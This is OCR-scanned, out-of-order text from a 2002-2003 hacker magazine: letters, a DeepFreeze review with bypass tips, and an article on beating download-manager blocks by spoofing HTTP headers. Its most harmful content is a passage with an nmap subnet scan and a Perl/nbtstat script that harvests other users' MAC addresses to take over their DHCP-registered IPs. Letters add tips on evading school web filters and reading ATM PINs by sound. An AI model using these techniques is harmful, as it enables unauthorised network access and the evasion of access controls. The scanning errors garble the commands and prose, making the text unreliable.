and zap it to your diskette. You can also disable 
the freeze icon in the system tray, forcing the 
user to use the keystroke combination of Ctrl- 
Alt-Shift-F6 to get to the password prompt. 

On the computer side, the computer now 
boots up frozen. If you hold down Alt-Shift and 
double-click the freezesicon (or use the above 
keystroke combination), a window will pop up 
prompting you for a password. At the top of the 
window, you can see your OTP token to get a 
password from the console, as well as the ver- 
sion number. The latest one I'm aware of is 
somewhere around V4.20. Enter the password 
ind you get three radio button options with the 
box labeled "status on next boot." The options 
are "boot frozen," "boot thawed for X reboots" 
(X is configurable), and "boot thawed” (until 
you say otherwise). Also, it appears that the lat- 
est version will automatically allow the updat- 
ing of daylight savings, without having to thaw 
the computer to change it. Perhaps this is the 
reason why DeepFreeze will block access to the 
lock now. 

Uninstallation for all three versions involves 
thawing DeepFreeze. With the first two versions 
you can then go to the control panel and add/re- 
move programs and remove it that way. The 
most recent version now requires that you run 
the setup file from your install disk with Deep- 
Freeze thawed for the option to uninstall, so 
don't toss the install disks after you're done with 
them 

There are still some issues with DeepFreeze 
that | doubt can be avoided through program- 
ining. First, naturally, is the observation that 
booting to a floppy will prevent DeepFreeze 
Irom starting. Any admin worth his weight will 
lum off boot from floppy and password the 
BIOS to prevent tampering as is. Second, Sys- 
tem Restore in Windows XP has the ability to 
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before going to a black screen, and in the upper 
left-hand corner of the screen you should see 
five dots appear, one second apart from each 
other. This is your opportunity to hit Ctrl-F8 to 
access a password prompt. After entering the 
password, you have numbered options available 
to you in a text screen, which you access by hit- 
ting the number. You can continue booting the 
computer, boot the computer thawed, or change 
the password. These are all pretty self-explana- 
tory. Note that this version has a few flaws in it. 
You can Ctrl-Break during bootup, either to 
mess with how Windows starts up, or even in 
theory to prevent DeepFreeze from starting. (I 
haven't tried this yet; we migrated away from 
this version pretty quickly.) Next, you have to 
thaw the computer on every reboot, so once the 
machine is thawed, you can keep it thawed by 
doing a soft-reboot in windows (left shift as you 
click okay to restart on the shutdown menu). 
Double-clicking on the frozen icon in your task 
tray displays ASCII text as was mentioned in an 
article. This is text used for One Time Password 
(OTP) generation. Basically, this version allows. 
you to call up Hyper Technologies and give 
them this code, and they reply with a password 
that is usable on that machine once. You can 
then reboot, use the OTP, and reset your pass- 
word. Obviously, a little social engineering is 
all that's needed to defeat this. Hyper Technolo- 
gies must have realized this, because it doesn't 
use this system anymore. 

The next two versions of DeepFreeze come 
in two different flavors. The first is Standard, 
which retains the stand-alone method of instal- 
lation of the old version and needs configuration 
on each computer. The second flavor is the Pro 
version, which comes as a console package, 
then creates individual, tailored. The two re- 
lease versions more or less are identical, the 
only difference being that one supports Win- 
dows through Win2000, and the most recent 
also supports XP. 

The console is kind of nifty. On install, it 
asks you for a string to make the console 
unique, so that one console won't affect every 
install of DeepFreeze out there. After that, it 
gives you the ability to create diskette-sized in- 
stall packages for your computers. By default, 
there is no set password, nor is there the ability 
to set a password. Default settings use only the 
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by The Flatline 

With the past few issues, I've noticed a few 
queries about a program called DeepFreeze. Be- 
ing someone who works with it on a day to day 
basis, I thought I might clear up a few murky ar- 
eas and discuss some of its features/drawbacks 
to help illuminate both users and admins who 
might be using this software. 

DeepFreeze is a program made by Hyper 
Technologies (www.deepfreezeusa.com) for 
Windows platforms, and is designed to be a de- 
terrent to "hackers" (quoting the website here), 
virus solution, and maintenance tool. Essen- 
tially, what the program does is take an image of 
your hard drive on installation and "freeze" the 
system, making any changes to the system after 
bootup temporary. I have been hard pressed to 
find something DeepFreeze couldn't undo after 
taking basic precautions (more on those later). 
Formatted drives are back on reboot, programs 
installed over a freeze are gone, a virus can even 
infect the system, and on a restart, it will be 
gone. However, the computer isn't permanently 
frozen. The program can be uninstalled of 
course, once the computer itself is "thawed," 
but DeepFreeze can also temporarily disable it- 
self for a time so that one may make changes as 
needed. It quickly becomes apparent that it is 
vital on installation of DeepFreeze to have 
everything perfect on your computer before 
freezing it. Disabling DeepFreeze can be a pain 
in the ass and time consuming, so getting a 
good, clean, working install right out the gate is 
vital. Obviously, for an open lab/school envi- 
ronment, DeepFreeze is incredibly useful in 
keeping computers running with relatively few 
problems. Unfortunately, I haven't taken a peek 
under the hood as it were to see just how Deep- 
Freeze does what it does, but my bosses and I 
would be very interested if someone out there 
would take a look and get back to us on the 
mechanics of the program. 

DeepFreeze currently has three major ver- 
sions that I am aware of and have had experi- 
ence with, two of which are outdated. The first 
is a standalone install, usable only in a Win- 
dows95/98 environment. This version is differ- 
ent from other versions in that it is the only one 
to have the disabling process before windows 
starts up. Watch the computer boot up. The win- 
dows splash screen should pop up for a moment 
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Tale From The Past | 


Dear 2600: 

Back in 1977 I bought my first computer: an 
Scientific CIP. This apparatus had a 6502 chip, 1 
BASIC in ROM, a full keyboard video 
and 4K of SRAM, expandable to on board 
32K with a daughterboard. Data storage was casse! 
tape. The CIP cost me $400, an affi 
pared to the $800 for a TRS-80 and the $1,200 for an 
Apple, and it was just about as powerful as the Apple. 

It didn't take me long to add and populate the 
daughterboard. It took me a little longer to double the 
processor clock speed, which I did by the simple ex- 
pedient of cutting the appropriate trace to the fre- 
quency divider chip and resoldering the clock signal 
to the next chip output. By the time I was through 
with that machine, it was a kludge of additions and 
changes, including an S-100 bus board (which I sol- 
dered myself) and a home-built power supply to re- 
place the original that died. 

I was what was then referred to as a hacker. We 
hackers were hardware freaks who made changes to 
our equipment by ourselves with add-ons that we gen- 
erally built ourselves, often with scavenged parts. 
Most of the things we made were kludges, that is, they 
looked like a rat's nest of bits and pieces and wire. 
They weren't pretty, but they worked. Wire wrapping 
was one popular kludge methodology and plugboards 
were another, but those specially designed kludge 
boards that eventually came out were just too sophis- 
ticated for us. 

Those old computers brought new meaning to the 
expression "open architecture" and gave us hackers 
lots of opportunity to experiment and improve. But 
once the Commodore 64 came out, I switched my en- 
ergies to software and machine language program- 
ming. It was just as well, because the term "hacker" 
started to take on a whole new, and much more pejo- 
rative, meaning. 

I buy 2600 every once in a while, in part to sup- 
port what I feel is a very worthy and admirable cause, 
and in part to try and stay abreast of some of the many 
security and privacy threats that are being visited 
upon us by governments. You are a voice in the 
wilderness. Thank you. 







John K. 


Retail World 


Dear 2600: 

I love your magazine, have been reading it for 
several years now. Like one of the letter-writers from 
the past issue, I'm afraid to subscribe, so I buy each is- 
sue (with cash) at B&N. I'm always amused by the re- 
actions the sales clerks give when they look at what 
I'm buying. I've had one lady sarcastically say "Al- 
ways a lovely publication." More recently, the guy 
looked back and forth several times between me and 
the magazine. The expression on his face clearly said 
"Oh, so this guy is a real live hacker!" Ha. Thank you 
for providing me with this personal joy every three 
months. 

Dan 


Page 49 





not have that telephone number. That is the same 
room where they held the talks about the Cuban mis- 
sile crisis. Well, hope this enlightens. 


Radarjam 
We admittedly don't know a whole lot about what 
goes on in that place. But common sense would dic- 
tate that repeatedly calling the equivalent of an inter- 
nal crisis center in an increasingly paranoid and 
powerful government may result in some kind of back- 
lash. Of course, the ease with which such information 
can be found makes one wonder how serious they are 
about keeping it secret in the first place. 


Dear 2600: 

I just picked up 19:3 and read your response to 
echolon's letter noting a phone number for a "situation 
room." When I tried your PDF URL I got a 404, so I 
thought ۲۵ let you know where I eventually found the 
info: http://www.fema.gov/emanagers/ecd toc.shtm. 
FEMA doesn't advertise this kinda stuff, but a search 
for "contact" produced it easily. 

sunzi 


Dear 2600: 

This was published in The Economist of October 
26. Countries were ranked according to press free- 
dom. The top five were Finland, Iceland, the Nether- 
lands, Norway, and Canada and the bottom five (135 
to 139) were Bhutan, Turkmenistan, Myanmar, China, 
and North Korea. Press freedom is not necessarily the 
preserve of rich developed countries, according to the 
study conducted by Reporters Without Borders. 
Though the best and worst included few surprises, the 
United States, in 17th place, came in below Costa 
Rica; Italy, the lowest ranked G7 country at 40th, sits 
only just above Mali; and Russia languishes at 121st 
behind both Sudan and Haiti. 

You knew this already, didn't you? 

Cambalache20 

Actually we didn't but it seems about right. Isn't it 
vdd though how all of the top five countries are high 
up in the North while the bottom five are all in Asia? 


Dear 2600: 

In 19:2 Bildo suggested using www.proxysite.- 
«om to bypass Websense, a proxy commonly used at 
schools for filtering web traffic. Since then, prox- 
ysite’s been blocked too. To view a page blocked by 
Websense, simply search for the page on Google and 
click their cached page. Just another suggestion for all 
the school-goers. 


kid0n 


Dear 2600: 
| noticed that there was an IP address if you 
‘lipped the table of contents over in 19:3 underneath 
Hardware Broadband Client Monitoring - An 
Overview." I typed it in and my browser gave me the 
Citizen Corps website. I thought that this was cool be- 
cause that site was right underneath the word 
Monitoring. 
derrick 
The things people find. 


Winter 2002-2003 







































Dear 2600: 

I think Jack Valenti is a great man doing great 
things. The hacker community will soon be behind 
him. 


christopher 
It's the logical place to be if we're about to 
overtake him. 


Dear 2600: 

I just received a shareholder report from one of 
the funds in which my 401k is invested. I usually 
throw the report out or file it away without reading it. 
After reading my earnings statement and finding that 
the value of my 401k had dropped by 20 percent, I 
thought maybe the report could give me a clue as to 
why this had happened. It cited various reasons al- 
ready covered by the media, but this was my favorite 
and I thought you might like to read this: 

"And Now for the Bad News... 

"...3. The popular passion to punish the corporate 
culprits is likely to achieve only modest satisfaction, 
Fraud was rare and is hard to prove in court. Legal 
but bad behavior carries little cost to the perpetrator, 
The U.S. does not have the strong ‘culture of shame 
which effectively regulates executive behavior in 
Japan. We have no compulsion for ritual apology (to 
say nothing of ritual suicide) in this country. Many of 
the executives who lost a fortune for the shareholders 
who trusted them simply will sail off into retirem 
on their yachts." 

This report came from the Clipper Fund. It has a 
web site at www.clipperfund.com. 

This report may not have much of an impact b 
hopefully it may open the eyes and ears of those whe 
refuse to listen to the same information just because il 
came from a hacker magazine. Thanks 2600. 


Dear 2600: 
just literally stumbled on this while researchin 

eei Go to www.singer.com, click on the " "in- 

" button at the bottom of the screen. Enter 

"quest" as both username and password. Voila! You're 

in the Singer Company's intranet. 


Or so they say. There doesn't seem to be a whol 
lot you can do as "guest." 


Dear 2600: 
I just got done reading 19:3. In the letters sectio 
echolon talks about White House numbers like 20% 
456-9431. I called it out of curiosity. The guy at 
phone answered "Situation Room." I asked what tl 
do there and he struck up a conversation about snow 
in the Rocky Mountains. Then he slipped and said h 
was in the White House. I called again later toni 
and a guy answered and asked for my name 
phone number. Of course I gave him false info (no 
like he couldn't have gotten it anyway). I asked th 
guy again what they do there and he put me on hold 
sec and said they were a private federal governmer 
agency and they take care of security matters. I spo 
to a close friend who is ex-Air Force Intelligence. He 
told me that is where the top military officials ho 
conferences on top military matters and that I sho 
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continued from page 39 


Dear 2600: 

I have found on several ATM's that all ten number 
keys have distinct tones and can easily be told apart. 
This is the dumbest thing an ATM manufacturer can 
do, as anyone with a good grasp of tones can easily 
get someone else's PIN without watching or very eas- 
ily record this, take it home, and analyze it with 
standard audio software. 

Mark 


At the very least, it can be used to impress (and 
frighten) friends as they shield the keyboard from 
your prying eyes. 


Dear 2600: 

You printed a letter in 19:2 regarding google re- 
moving a site from their directory due to à DMCA vi- 
olation which was filed on behalf of the 
Scientologists. I tend to get a chuckle out of the Sci- 
entologists so I figured I'd see what the violation was. 
At first I found mostly boiler plate stuff (pictures and 
documents) until I scrolled down to the end. Under 
"Federally Registered Trademarks" we find an L. Ron 
Hubbard signature which is registered with the United 
States Patent and Trademark Office under registration 
number 1,821,751. 

Now let me get this straight. This idiot actually 
went and trademarked his signature? Wow, | wonder 
what happens when he signs for a Fed-Ex package. 

The Nibbler 


It probably causes quite a commotion. 


Dear 2600: 
Late one Tuesday night I came to a realization. As 
I finished a box of Cheez-Its, I realized that if one 
halved the box at an angle, it makes two perfect hold- 
ers for one's issues of 2600! Sadly, I only had enough 
issues to fill one, but I trust I'll fill the other. 
Spooky Chris 
Perhaps we're witnessing the birth of a new 
phreaker box - The Cheez Box (not to be confused 
with the original Cheese Box of days past). 


Dear 2600: 

While I was at FOX's web site trying to find out 
when 1 might be able to buy episodes of Family Guy, I 
ran across this gem: 

"8. Can I get tapes of FOX Network Primetime 
Shows sent to me? 

"ANSWER: The FOX Network does not provide 
nor sell videos of any of shows [sic], specials or 
movies that air on the Network. 

"Our recommendation is to ask co-workers, 
friends, family and neighbors for anyone who may 
have taped off-the-air the show you are looking for." 

Now correct me if I'm wrong but wouldn't that be 
stealing or some sort of copyright infringement? Sar- 
casm fully intended. It sickens me to realize that this 
was my first thought when I read this. Look at what 
corporate America is doing to people. Down with 
corporate rule! 

You guys do a fantastic job. Keep up the great 


work. 
jesse 


Let's just hope this common sense approach 
becomes more of a standard. 
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interested in privacy or security or anyvof-the artful 
dodges used to describe good hackers. They were and 
are interested in screwing Ma Bell In a word, 
stealing. It's ludicrous. 

Then inside the magazine there de lovely artic 
about how to cheat Blockbuster, say naughty et 
on the scoreboard during a football game (not real 
but if you couldn't read that between the lines get. 
imagination), a lovely personal ad for a a guy who 
wants to break into homes through garage doors when 
he gets out of prison, another from a prisoner who is a 
virus writer wanting help to become an expert in his 
chosen hacker skills, and a third that can only be de- 
scribed as pornographic. Do you guys have editors? 
Do you have editorial standards? I know you live on 
Long Island, but please! 

If your magazine is for good hackers, presumably 
those with nothing to fear from the law, then why are 
the vast majority of articles and letters 
authored/signed by persons using pseudonyms? May I 
answer? Your magazine, as currently published, can 
easily be shown to be a thinly disguised manual for 
criminals. You have every right to publish it and to 
rant and rave that you're really the good guys. I main- 
tain that an objective (and probably even computer ig- 
norant) reviewer would conclude that you're 
delusional at best. As a computer knowledgeable per- 
son who has been on this planet for just less than 0x40 
years I applaud your defense of free speech, fair use, 
and other freedoms. I abhor your wink and nod 
approach to criminal activity. 

Well, it's not fair to criticize without offering an 
alternative so here it is. Instead of hackers (who are 
bad and acknowledged as bad) and 2600, change the 
title of your group and the name of your magazine to 
"Sweepers." Like all else these days, it's an acronym. 
System Weakness Exploration Explanation (not Ex- 
ploitation!) Publication Ethical Remediation 
Standards. 

That's what "good" hackers do. They explore sys- 
tems with the principal intent to learn. When (if) they 
find a weakness they explain it and, in a responsible 
way, publicize it and hopefully publicize 
workarounds (remediation). All of this is done in an 
ethical way following published standards with no in- 
tent for monetary gain (intellectual gain is fine, indeed 
the main motivation). Standards for publication by a 
Sweeper should include letting the author know first. 
Wider publication should be done only if the author 
fails to respond and only if a suitable workaround is 
published at the same time. Absent a suitable 
workaround and author response, the publication 
should be limited to "there's a problem with product x 
and the author won't deal with it," not what the prob- 
lem is or how to trash the system and show the author 
just how smart and powerful we are! Letting the 
world know that independent, better-than-average 
beta testers (our word is sweepers) have discovered a 
significant problem will, in most cases, sufficiently af- 
fect sales and the author will get the message very 
quickly. 


ble. If you have suggestions or want to help out, email 
us at downtime 2600.com. 

Critique 

Dear 2600; 

I must voice my objection to the "angle" 2600 
took on its coverage of Sherman Austin's indictment. I 
have always placed strong faith in 2600 and its posi- 
tion of supporting free speech. However the way in 
which your online article was worded reminded me of 
the tacties national news coverage often use to depict 
hackers. "It is not clear why Austin is being targeted; 
more detailed and potentially destructive bomb-mak- 
ing information is readily available at public libraries 
or on Amazon.com." It, to me at least, is very obvious 
that the reason why Sherman Austin is being targeted 
is because the man has upside down and burning 
American flags on his web site (www.raise- 
thefist.com). Make an outcry for the man's right of 
free speech, cite the government's Gestapo-like tac- 
tics, but for pete's sake don't martyr a man because he 
shares some of your ideas at the expense of journalis- 
lic integrity. I admit some of Austin's ideas are appeal- 
ing but right-wing-ism (making bombs, stickers 
calling us to arms, blatant disregard for the way others 
think) is not the 2600 that I have come to know. If it 
is, then I for one feel that 2600 and I must go our 
separate ways. 

AGE 18 

You may have already begun that journey. We 
wand by the story (which only appeared on our web- 
ute and not in these pages) as an example of how 
someone with unpopular views can be indiscrimi- 
nately targeted for prosecution while other more 
mainstream outlets of the same views remain un- 
touched. How you see us making a martyr of him is to- 
tally beyond us. And if you truly believe that only the 
right wing believes in the things you cite, we suggest 
reading some history or simply getting out a bit more. 


Dear 2600: 

Perception is reality. The perception (in the real 
world) is that all hackers are bad. So it's the reality, 
and that's that. I know you guys and the readers of 
your magazine think and know otherwise but what the 
real world perceives is reality. Get over it! There will 
never be good hackers. 

Can you imagine a World War II veteran believing 
that there were good Nazis? Can you imagine an early 
western settler believing that there were good Indi- 
ans? Can you imagine a southern redneck believing 
that there are good N....? No way. No one but the 
readers of this magazine (who are so paranoid that 93 
pervent of them buy it off the rack) will ever believe 
that there are good hackers, No amount of money or 
promotion or ranting will change that. 

On top of that you title your magazine "2600." Do 
you really know what 2600 is? Let me tell you what it 
ı» ın the real world. It's a four digit number that stands 
lor a five letter word: fraud. Nobody who built a blue 
s, or gleefully calls themselves a "phone phreak" is 





Page 51 


Winter 2002-2003 






Parallels 


Dear 2600: 
I'm about to draw a comparison that will surely 
raise some hackles amongst the hacker community. 
To set the stage of how this crossed my mind, | was 
driving home from work and heard something on the 
radio where a local business was having a to-do of 
some kind to honor the fallen firefighters from 9/11. 
(They made no mention of the police that died that 
day.) Next to me in the passenger seat was my crisp 
new copy of 2600 that I haven't even finished reading 
yet and it dawned on me: hackers and cops are a lot 
alike in some regards. You see, I'm a cop. And an avid 
reader of 2600. And a want-to-be hacker. I just don't 
have the time right now to devote to learning how to 
program and I refuse to be a grown up script kiddie. 
But 1 digress. How are we alike, you ask? Hackers, 
the real ones, work hard at becoming good at some- 
thing and most desire only recognition for achieve- 
ments and take pleasure in discovering security holes 
and learning how to fix them (only to name a couple 
things). The hacker community constantly has to deal 
with a host of morons who pretend and claim to be 
hackers but instead give everyone else a bad name. 
And us cops? We, too, bust our asses to do our jobs, 
get little recognition for it, and the ones who stick. 
their head up their own asses and do something dumb 
attract the whole country's attention and we, too, be- 
come public enemy number one. The big difference? 
People smile and play nice when I'm around... a 
hacker walks through his high school wearing a Free: 
Kevin shirt and gets expelled. Oh yeah, why would # 
cop want to learn how to hack? Someday | hope to 
work for the Feds hunting down those who would vic- 
timize children through kiddie porn. I consider that, 
besides drugs, one of the most important things the 
government can focus on. So hack on! And keep 
putting out this kick ass mag knowing that there's at 
least one of me out there on your side. 
Sparkster 


A New Project 


Dear 2600: 
Do you expect a DVD version of Freedom 
Downtime to be available for the holiday season? 
Poetics 
Yes, we do, but not for the holiday season that just 
passed, In fact we hope to have the DVD finished well 
before the next one. This project is dependent entirely 
on how much time we can allocate to it as well as how 
much money we can raise through video sales. We ex- 
pect to add quite a few features and additional 


footage, as well as other things. We're still open ta ' 


suggestion on this. 


Dear 2600: 
I'll be more than happy to translate Freedom 
Downtime into Italian when you get the DVD out, 


Elf Qrin 


As this is our latest project, we're in the process of 
getting a bunch of translations done as soon as possi- 
nda aad 


2600 Magazine 


Dear 2600: 

I would like to say something about fuzzhack's 
letter from 19:2. You're just a little too paranoid. I had 
the same thing happen to me at my local Borders 
store. But using à little observation I determined that 
the cashier that rang me up must have been new since 
he was asking the other cashier for help and that both 
cashiers were asking everyone for their email address. 

Zac T. 


Dear 2600: 

In response to Signal9's letter about the poor 
placement of 2600 I would like to add a quick note. 1 
reside in Princeton, New Jersey and in the Barnes & 
Noble locations there all of the 2600 magazines are 
easy to spot and in front of all other magazines. Most 
probably due to the fact the dimensions of 2600 are 
smaller than others, but I have never seen anyone 
shun people picking it up or checking out with it. 

XiChimos 


Dear 2600: 

In response to Signal9's letter about the placement 
of magazines in stores, | would like to shed some light 
on the subject, It was described as though the stores 
are trying to "hide" your magazine on the back shelf, 
along with Adbusters. Not so. As the periodicals clerk 
for a major bookseller, | can assure you that the mag- 
azines who pay to have face outs (front slots) are the 
ones who are in the front. This is why the magazines 
were moved to their proper area - so that they would- 
n't face a fine if discovered. In my store, both 2600 
and Adbusters are in the front. I don't know how fa- 
miliar you are with magazine vendors and news- 
stands, but we are very open minded individuals, as 
we set up our stand with merchandising systems that 
are made to sell, not hide, magazines. By the way, 
2600 fies off our shelves within days of receiving 
them. We have to up the draws frequently. 

2cj626 


Dear 2600: 

I know I may be a little late on this but, after see- 
ing one letter from another reader in 19:2, I thought I 
would email you. I try to get a copy of 2600 whenever 
I can at the B&N near me and, every time I have gone 
there, the issues of 2600 have always heen displayed 
right at the front of the shelf in front of any magazines 
that may hide it, and at easy-to-find eye level where 
anyone can readily find it. No one has ever looked at 
me fishy for buying it nor asked me any questions 
about it. 

So either the managers at this particular B&N 
don't care, believe in being fair, or just don't know 
what 2600 is about. Either way, it's nice to know that 
not all retailers are the same. 

pinchepunk 

We believe your experience is more the norm than 
the exception. As with most everything, negative 
experiences can be more memorable. 
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BEATING DOWNLOAD 


MANAGER PROTECTION 





terfaces and then you must choose the proper 
one. See the documentation for full details. 
Using sniffit: sniffit -t ۵ -F pppO 

Using windump: windump -w output.cap -i | 

Now we are all set to capture the headers, 

Go back to your browser and click on the 
proper link for the file. Choose a place for it to 
reside and start the download. Let the file 
download a few kilobytes, then stop it. Now 
let's look at the packets we captured. Sniffit 
will leave behind some files with names like 
"65.23.29.34.33265-208.48.67.24.80" which 
you can view with your favorite text editor. 
When using WinDump, opening the output 
file with Dice will give you a list of all the 
packets you caught. The packets of interest are 
usually the first few leaving your machine. 
You can tell it is leaving as the first IP address’ 
port number is pretty large, such as in the ex- 
ample file name above. Find the HTTP request 
the browser sent. It will look something like this: 
GET /myDLmanagerblockedfile.avi HTTP/1.0 
Connection: Keep-Alive 

User-Agent: Mozilla/4.78 [en] (Linux 2.4.8 
i686) 

Host: nodlme.com 

Accept: image/gif, image/jpeg, image/pjpeg, 
image/png, */* 

Accept-Encoding: gzip 
Accept-Language: en 
Accept-Charset: iso-8859-1, *,utf-8 

Cookie: f908dkl-93 
Referer: http://Awww.nodlme.com/videoS.html 
Ah ha! There are some odd HTTP headers 
in the request. The two lines we want to pay 
attention to are the "Referer" and "Cookie" 
lines. We also need to include the "User 
Agent" header in our download manager's re- 
ques. Now we know how to emulate the 
browser! 

Finally, lets set wget to retrieve the file. 
The wget command using the above captured 
packets will look like this: 
wget —user-agent-'Mozilla/4.78 [en] (Linux 

2.4.8 1686)' V 
--header-'Cookie: f908dk1-93' V 
--header-'Referer: 
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by Straightface 
straightfacegangsta ۵ excite.com 

While searching for interesting files on the 
net you may encounter a file that has been 
"Download Manager Blocked," meaning that 
you must use a browser to get the file. If you 
attempt to download the file with a download 
manager, you will receive a lovely text mes- 
sage in place of the file you desired informing 
you of your "mistake." Some may feel de- 
feated, but with a little slight of hand you can 
use a download manager to retrieve the file. 

The initial question we have to ask our- 
selves is "how in the world does the server 
know whether the program making the down- 
load request is a browser or not?!?" The an- 
swer can be found by analyzing the HTTP 
headers the browser sends in its request for the 
lile. The server attempts to protect itself from 
download managers by checking for particular 
HTTP headers. Usually it checks the "User 

Agent" header and can also check for a cookie 
or referring page header. 

First we must fill our tool box with the 
proper tools. We will need a packet sniffer to 
learn how the browser is communicating with 
the server. Sniffit is a nice one for Linux. If us- 
ing Windows, WinDump works well. Be 
aware the WinPcap libraries are needed for 
WinDump to work properly and can be found 
on the WinDump web site. I also employ the 
Windows program Dice to read the raw files 
WinDump creates. We are also going to need a 
nice customizable download manager. For this 
| choose wget. It is available for both Linux 
and Windows, free, and has a very small 
footprint. 

Once we have all the tools ready we can 
begin to collect the proper HTTP headers. 
Start up the browser of your choice and bring 
i to the web page with the link of the file you 
want to download. Make sure you have your 
cookies enabled on the browser. Now it is time 
to start up our packet sniffer. Make sure you 
are sniffing the right interface. In this example 
the interface is ppp0. WinDump requires you 
lo first run it with the -D option for a list of in- 
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out of every 250,000 people has a brief moment of 
glory, one out of every 500 people will be remem- 
bered within 10 years of their glory, but only one man 
will ever be remembered as the man that dare break 
the boundaries and rules." This is what we do. We are 
that one person, us as a flock, a whole. Groups slowly 
fade. Fashions slowly die out. We are unlike any 
other. Put us in a box and we will scale the walls to 
free ourselves. We do not crumble, nor cry, nor sepa- 
rate. We are brothers and we are sisters. Hath not the 
fury of ten thousand burning suns to melt us, nor ten 
thousand blows of the heaviest hammer to break us. 
We are Hackers and we are Phreakers. Ph34r us now, 
but do not expect the feeling to be mutual, 
füx deacon - 
It's moments like these when it becomes clear that. 
we could start a cult and probably get away with all 
kinds of things. But seriously, let's not lose touch with 
our human origins. 


Reaching Out 


Dear 2600: 

Greetings. I've been reading your magazine for a 
few years now, glancing at the website on various oc 
casions as curiosity demanded. I currently live in one: 
of the larger cities in Alabama and through my day job 
became familiar with one of the men running for Sen- 
ator here in the state. He approached me seeking in 
formation about maintaining an Internet broadcasting: 
system (in fact, a few meetings went by without me 
being aware that he was in the running). This partici 
lar person seemed at least somewhat familiar with the: 
computer world although his lack of experience and 
knowledge had me worried for a little while in rega ۱ 
to the laws recently passed that affect net broadcas 
ers, I brought this to his attention and even loaned hi 
a few of my 2600 issues in hopes that he'd get a bette ۲ 
idea of what he was in for. Days went by and he came 
back to me with my books, full of questions which T 
did my best to answer and a lot more determined to d 
what he could in order to affect changes within hii 
scope in the Senate race. Sadly though, he didn't i 
This however hasn't changed his views (which 
recently broadened by 2600 I might add). 1 guess this 
goes to show that while corruption may in fact be all 
over the U.S. and other parts of the world, there are 
those people who do want to make a change and 
do want a better life for not only themselves but 
children and beyond. 

It may not seem like there is much point to this le 
ter but it has been quite a change of pace compared to” 
the normal routine I run into that all "hackers" are 
and thieves, etc... blah blah blah. It has also shown me 
personally that there are people trying to get into posi- 
tions in order to affect changes that would not only 
benefit certain communities, but attempt to und. 
some of the wrong decisions made before them. 

N 4 

We're going to need a whole bunch of these peor 
ple. We're grateful for your efforts in planting some 
seeds. 


2600 Magazi 


These standards can be easily adapted to editorial 
standards as well, although the magazine might get 
thinner for a while. 

Dave D. 

After taking a vote, we've decided to take offense 
at being compared to Nazis. We're going to let the 
Long Island remark slide. That aside, you raise some 
interesting points. But you also claim to know, among 
other things, how the whole world perceives a partic- 
ular group of people, what's going through our heads, 
as well as the intentions of everyone who writes in to 
us. While some of the worst element that you describe 
does in fact exist, to say that it is the norm and that we 
encourage this kind of thing is unfair and highly inac- 
curate. You clearly don't know the history and you 
cannot know what people get out of the articles they 
read and write in our pages. The only advice we can 
offer is that you stop assuming that everyone thinks 
like you. Best of luck in the sweeper world. 


Significant Developments 


Dear 2600: 

Well 1 don't know if you care but I am in the group 
2600 for seti@home and ironically, I just hit 2600 re- 
sults sent! Just wanted to let ya know, not that you 
probably care! 

RusH 

Of course we care. Although we're quite disap- 
pointed that this magic number didn't result in a dis- 
covery. This is one of the most worthwhile projects 
we're aware of and for those who want to get involved 
and learn a whole lot more about it, go to http://se- 
tiathome.ssl.berkeley.edu. 


Dear 2600: 

According to an article at newscientist.com, in the 
year 2600 an asteroid that orbits the sun along the 
same path as the Earth will in fact orbit the Earth for 
50 years as a second moon. Amazing... even the 
heavens and the earth are controlled by 2600. 

fstratto 

Incidentally, we're planning on cutting our sub- 
scription price in half for the entire year of 2600 as a 
special promotion. Stay tuned for more details. 


Defining Hackers 


Dear 2600: 

I am no important sports star, I am not the lead ac- 
tor in the school play, nor the highly grungical youth 
who pedals the hallways in search of some untimely 
demise. 1 am me. I am here for who I am, not a fol- 
lower of a group nor a piece of a puzzle. Let me in- 
stead be considered the shepherd to a flock of sheep. 
But that flock weights so heavily on the judgmental 
aspects of society. You see, this flock and I are those 
that long for what is never achieved, strive for what is 
never gained, hope for the light at the end of the tun- 
nel that is too long to walk, too strenuous to master. 
We are those unlike others. We may not fit society's 
mold of the conventional "norm," we may not walk 
the guidelines to call us average. But then again, who 
would want to be average? A fact once stated, "One 
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you are someone else. Easy, right? The hard part 
is how we get the MAC addresses. Luckily, Mi- 
crosoft has provided us with an easy way to 
query MAC addresses from remote computers, 
Netbios strikes again! First we need to generate 
a list of IPs of computers that are on our subnet. 
If our IP is 24.64.220.20 then we can be pretty 
sure that all of the people on 24.64.220.* have 
registered MAC addresses, First we will do an 
NMAP scan on port 139 (netbios port) on our 
subnet and generate a list of IPs to query for 
MAC addresses. 

‘nmap -sS -p139 -oM '-' 24.64.23]."*" | grep 
open | cut -d " " -f 2 ] ip list' will generate our 
list. This should work on Linux and Windows 
(if you have installed Cygwin and NMAP). 
Then we need to get MAC addresses for all of 
the IPs. This can get a little ugly when you 
have to do it manually. On our Windows box, 
the command 'nbtstat ñA [IP Address]! will 
give us the MAC address of the remote host as 
well as some other useless info. Here is a little 
script to generate an IP-MAC table. We will 
need to do a ‘cat ip. list | perl this script' on our 
Windoze box. 


while ([]) { 

chomp ; 

Sip-$ ; 

chomp ($mac raw- nbtstat -A $_ | grep 
MAC); 

(undef,undef,undef,$mac)=split (' 
'$mac raw) ; 

print "$ip $mac\n" ; 

} 


Redirect the output to a file and wait a few 
minutes. Then run the script again and see 
which IPs don't return a MAC address. These 
computers are no longer accessible meaning 
that their MAC can be used to authenticate 
against the DHCP server. Follow the steps out- 
lined above using your newfound MAC address 
and you are on your way. 

Final Thoughts 

While using multiple IPs is a good way to 
cover your tracks, it is in no way a magic ring 
that makes you invisible on the Internet. Think 
of it more as an added layer of confusion when 
trying to follow your tracks. At the very least I 
hope that you learned about Cygwin and how it 
can add a whole new dimension to your Win- 
dows world. I have written several scripts 
around these concepts. Feel free to email me for 
copies. Happy haxOring! 
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Unix-like functionality on your Windows box, 
not the least of which is perl, which we will be 
using later. Cygwin is free at http://sources.red- 
hat.com/cygwin/. 

The Non-Authenticating DHCP Server 

This could also be called the "easy to fool 
DHCP server," simply because it will hand out 
an IP to any old MAC address. As mentioned, 
your MAC address is what the DHCP server 
uses to keep track of who's who. Unlike the au- 
thenticating DHCP server, we will not need to 
perform any real magic to get a new IP. For the 
rest of the article I will assume that we are using 
ethO for our external interface on our Linux box. 
So... let's do some initial checking. To find our 
MAC address we can simply do an ‘ifconfig fia 
eth0'. Or, if we really want to feel like Unix 
geeks we can use: ‘ifconfig -a eth | head -1 | cut 
۲۱۱ -d " ۳۰ This command will become useful 
later when you write a script to automate the 
new IP process, right? We also need to take a 
look at our DHCP cache. Lets do an و‎ 
/etc/dhepe'. You will likely see the following 
